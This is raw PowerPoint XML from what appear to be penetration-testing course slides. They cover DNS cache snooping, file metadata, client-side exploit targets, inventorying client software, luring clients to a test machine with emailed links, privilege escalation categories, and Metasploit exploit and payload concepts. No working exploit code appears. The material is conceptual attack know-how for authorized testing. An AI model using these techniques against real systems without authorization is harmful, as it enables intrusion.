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51"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="262" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="298" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="282" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="281" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="273" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="279" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="275" r:id="rId25"/>
    <p:sldId id="276" r:id="rId26"/>
    <p:sldId id="277" r:id="rId27"/>
    <p:sldId id="278" r:id="rId28"/>
    <p:sldId id="283" r:id="rId29"/>
    <p:sldId id="280" r:id="rId30"/>
    <p:sldId id="284" r:id="rId31"/>
    <p:sldId id="299" r:id="rId32"/>
    <p:sldId id="285" r:id="rId33"/>
    <p:sldId id="286" r:id="rId34"/>
    <p:sldId id="287" r:id="rId35"/>
    <p:sldId id="288" r:id="rId36"/>
    <p:sldId id="289" r:id="rId37"/>
    <p:sldId id="290" r:id="rId38"/>
    <p:sldId id="295" r:id="rId39"/>
    <p:sldId id="291" r:id="rId40"/>
    <p:sldId id="293" r:id="rId41"/>
    <p:sldId id="294" r:id="rId42"/>
    <p:sldId id="292" r:id="rId43"/>
    <p:sldId id="296" r:id="rId44"/>
    <p:sldId id="300" r:id="rId45"/>
    <p:sldId id="297" r:id="rId46"/>
    <p:sldId id="301" r:id="rId47"/>
    <p:sldId id="302" r:id="rId48"/>
    <p:sldId id="303" r:id="rId49"/>
    <p:sldId id="304" r:id="rId5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/>
    <p:restoredTop sz="94662"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="90" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="1608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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId55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269AB6-01EE-4BC3-8EC2-78B05B7E064C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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4CAD47-ED24-40F3-8019-D2E9627AB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281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4CAD47-ED24-40F3-8019-D2E9627AB66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364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“if it isn’t broke, don’t touch it”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4CAD47-ED24-40F3-8019-D2E9627AB66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152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 smtClean="0"/>
              <a:t>13 root name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" i="1" dirty="0" smtClean="0"/>
              <a:t>servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" i="1" dirty="0" smtClean="0"/>
              <a:t> worldwide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4CAD47-ED24-40F3-8019-D2E9627AB666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152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 can determine the records that a DNS server has loaded in its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cache. We are given back a set of root name servers, implying that the name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server didn't have the information we requested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4CAD47-ED24-40F3-8019-D2E9627AB666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3731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4CAD47-ED24-40F3-8019-D2E9627AB666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9701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4CAD47-ED24-40F3-8019-D2E9627AB666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8234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4CAD47-ED24-40F3-8019-D2E9627AB666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6622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Metadata can provide very useful information to a penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tester.Many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> users are not even aware that this information is being attached to their files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4CAD47-ED24-40F3-8019-D2E9627AB666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931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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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22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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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710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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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943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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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008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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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264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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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230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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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307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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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510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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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751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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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164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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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BCB9B-6597-48A4-BB99-414FB3810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665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73F44-CEC2-407A-AABF-E883E8D224C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/20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7BCB9B-6597-48A4-BB99-414FB3810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851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testmachine.org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10.144.30.xx/xxxx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10.144.30.x/" TargetMode="Externa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 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b="1" dirty="0" smtClean="0"/>
              <a:t>EXPLOITATION</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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447800" y="2362200"/>
            <a:ext cx="6353175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600199" y="3581400"/>
            <a:ext cx="6353175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536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Notable Client-Side Exploits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sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Internet Explorer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firefox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Media players</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>QuickTime Player</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real Player</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Winamp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Document-Reading Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acrobat Reader</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Word, PowerPoint, Excel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run-Time Environments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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613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Determining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Client-Side</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Programs In use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How  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to  know  which  client-side  software  ¡s </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ask  target  personnel </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If  they  are  interested  in  a thorough  test,  they  may  provide  info </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make  a checklist </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have  them  surf  to  testing  systems </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limited - focuses  on  browser  types  via  User-Agent  strings </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires  user  interaction </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outbound  web  proxy  may  disguise  client  types </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guess </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It  is  not  hard  to  anticipate  what  they'll  be  running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50363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Client-Side Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Inventory</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Tools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 smtClean="0"/>
              <a:t>Ask </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>personnel to run a software inventory tool on representative workstation and send the results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Baseline Security Analyzer (MBSA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>very helpful</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Custom-written </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>scripts can be helpful too that simply perform a recursive search of C:\Program Files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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C:\&gt; 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dir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 /s "c:\Program Files" &gt; inventory.txt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/>
              <a:t>Output includes last update date of files... indicating last revision and possibly patch date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01291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Making Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Software Testing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Systems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With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an inventory of client programs, how can we get client software to access the testing machine?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manual user intervention, coordinated via telephone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E-mail with links </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure recipients are in the project scope </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Script that  launches client programs: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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C:\&gt; c:\windows\ie7\iexplore.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.testmachine.org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:\&gt; “c:\program files\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Mozilla                        Firefox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”\firefox.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.testmachine.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3353513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Local Privilege Escalation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 smtClean="0"/>
              <a:t>Besides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>service-side and client-side exploits, we also have local privilege escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require some form of access on the machine in advance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Possibly client-side exploits, server-side exploit, password guessing , password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sniffing,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0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from a limited privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lv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/>
              <a:t>to higher privileges, such as :</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Root /UID 0 on Linux or Unix</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Administrator or SYSTEM on Windows </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can allow tester or read arbitrary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>files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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system and install software,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run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a sniffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a: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6629400" y="3124200"/>
            <a:ext cx="2272665" cy="3429000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1663261" cy="2406116"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1663261" cy="240611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just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 b="1">
                  <a:effectLst/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>Target Machine</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100">
                <a:effectLst/>
                <a:ea typeface="SimSun"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRPr>
            </a:p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ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t> </a:t>
              </a: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460858" y="307238"/>
              <a:ext cx="847090" cy="85534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b="1" dirty="0">
                  <a:effectLst/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>High Privilege Process</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:effectLst/>
                <a:ea typeface="SimSun"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRP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102413" y="1492301"/>
              <a:ext cx="847090" cy="85534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b="1" dirty="0">
                  <a:effectLst/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>Limited Privilege Process</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:effectLst/>
                <a:ea typeface="SimSun"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Down Arrow 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1734255" flipV="1">
              <a:off x="453542" y="1133856"/>
              <a:ext cx="328930" cy="454025"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow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76952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Local Privilege Escalation Attack Categories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Various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>types of local-privilege escalation attacks:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Race conditions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks against the kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local exploit of high-privileged program or service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux / UNIX: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> O executable files binaries or scripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows: Attacks against processes such as csrss.exe, winlogon.exe, Isass.exe, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="782414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Metasploit Exploitation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b="1" dirty="0"/>
              <a:t>Framework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 smtClean="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a free, open-source exploitation framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What's an exploitation framework?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An environment for running numerous different exploits in a flexible fashion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An environment for creating new exploits, using interchangeable piece parts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Simplifies the creation of new exploits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standardizes the usage of new exploits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runs on Linux, Mac OS X, and Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Although, according to documentation for some versions, "The Metasploit Framework is only partially supported on the Windows platform. If you would like to access most of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Framework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features </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from Windows, we recommend using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>virtualization   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environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>such as VMware with a supported Linux distribution..."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639998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Metasploit Arsenal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1" y="1447800"/>
            <a:ext cx="87630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9504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Exploit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An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit is the means by which an attacker, or pen tester for that matter, takes advantage of a flaw within a system, an application, or a service. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended.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00862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Payload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 smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>payload is code that we want the system to execute and that is to be selected and delivered by the Framework. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A payload could also be something as simple as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>a few commands to be executed on the target operating system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The payload makes the target to do something the attacker wants</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331506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What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>is Exploitation?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Code  or  technique  that  a  threat  uses  to  take advantage  of  a  vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For  a  penetration  tester  exploitation  often  involves  gaining  access  to  a machine  to  run commands on it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Possibly with limited privileges </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perhaps with super user privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Examples: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
